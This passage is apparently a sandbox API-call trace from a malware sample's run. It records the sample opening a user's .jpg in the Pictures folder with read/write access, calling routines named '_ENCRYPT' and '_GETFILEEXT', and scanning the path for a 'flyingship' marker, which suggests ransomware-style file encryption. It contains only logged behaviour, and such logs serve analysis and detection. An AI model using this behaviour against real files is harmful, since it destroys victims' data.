[0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0188.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.977] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.980] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8a0 [0188.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.981] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\8tj3gtlol3fhi5e.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.983] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.983] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.983] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.983] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.983] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0188.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.984] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.984] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.984] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.984] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.984] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.984] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.984] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.985] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.985] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.985] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0xe088b7f0, ftLastWriteTime.dwHighDateTime=0x1d5e08b, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 0x90add8 [0188.985] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.985] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0xe088b7f0, ftLastWriteTime.dwHighDateTime=0x1d5e08b, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 0x90add8 [0188.985] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.986] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 